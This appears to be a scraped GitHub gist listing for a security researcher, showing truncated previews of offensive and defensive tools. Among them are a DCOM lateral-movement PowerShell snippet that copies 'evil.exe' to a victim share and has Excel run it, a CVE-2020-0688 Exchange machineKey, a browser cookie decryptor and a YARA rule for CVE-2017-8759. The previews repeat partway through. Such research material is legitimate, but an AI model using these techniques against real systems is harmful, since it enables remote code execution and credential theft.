Rich Warren rxwx

## findhosts.py
#!/usr/bin/env python

import OpenSSL
from iptools import IpRangeList
import ssl
import socket
import sys
import argparse

def do_scan(range, csv=False):

## exploit.pptx

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rxwx
                / exploit.pptx
            
            
              Last active
              September 13, 2017 08:25
            
              
                CVE-2017-8759
              
          
            View raw
        
    
## foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

## CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
   meta:
      description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
      author = "Rich Warren @buffaloverflow"
      reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
      date = "2017-09-17"
   strings:
      $s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
   condition:
      $s1

## get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in

function decodeHtml(html) {
    var txt = document.createElement("textarea");
    txt.innerHTML = html;
    return txt.value;
}

function httpGet(){

## ziptool.ps1
<#
.SYNOPSIS
Author: Rich Warren

Based on original c# code by Jon Galloway:

https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib

.DESCRIPTION
Tool for creating a Zip file in native Powershell with .NET 3.0 only.

## CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />

## vivaldi-decrypt.py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil

def clean(x):
    return x[:-ord(x[-1])]

# Make a copy of the cookie file

## offver.py
import re
import sys

versions = {
    0x00: 'Excel 97',
    0x01: 'Excel 2000',
    0x02: 'Excel 2002',
    0x03: 'Office Excel 2003',
    0x04: 'Office Excel 2007',
    0x06: 'Excel 2010',

## cDefaultLaunchAttachmentPerms.md

      
              1 file
            
          
              1 fork
            
          
              1 comment
            
          
              1 star
            
          
                rxwx
                / cDefaultLaunchAttachmentPerms.md
            
            
              Last active
              June 8, 2022 11:06
            
              
                Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
              
          
    Description

This Gist documents the values of the HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\11.0\FeatureLockDown\cDefaultLaunchAttachmentPerms registry key in each version of Adobe Reader 11.0.10 -> 11.0.x
Value meanings

According to: https://www.adobe.com/devnet-docs/acrobatetk/tools/PrefRef/Windows/Attachments.html#idkeyname_1_2986
There are 3 possible values:
	#!/usr/bin/env python

	import OpenSSL
	from iptools import IpRangeList
	import ssl
	import socket
	import sys
	import argparse

	def do_scan(range, csv=False):
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
	# Windows 10 specific, but searches PATH so ..
	copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
	$excel.ActivateMicrosoftApp("5")
	# excel executes your binary :)
	rule CVE_2017_8759_CRLF {
	meta:
	description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
	author = "Rich Warren @buffaloverflow"
	reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
	date = "2017-09-17"
	strings:
	$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
	condition:
	$s1
	// paste this in the chrome console and call findMemberID() when on a profile page
	// need to be logged in

	function decodeHtml(html) {
	var txt = document.createElement("textarea");
	txt.innerHTML = html;
	return txt.value;
	}

	function httpGet(){
	<#
	.SYNOPSIS
	Author: Rich Warren

	Based on original c# code by Jon Galloway:

	https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib

	.DESCRIPTION
	Tool for creating a Zip file in native Powershell with .NET 3.0 only.
	from Crypto.Cipher import AES
	from Crypto.Protocol.KDF import PBKDF2
	import sqlite3
	import os
	import shutil

	def clean(x):
	return x[:-ord(x[-1])]

	# Make a copy of the cookie file
	import re
	import sys

	versions = {
	0x00: 'Excel 97',
	0x01: 'Excel 2000',
	0x02: 'Excel 2002',
	0x03: 'Office Excel 2003',
	0x04: 'Office Excel 2007',
	0x06: 'Excel 2010',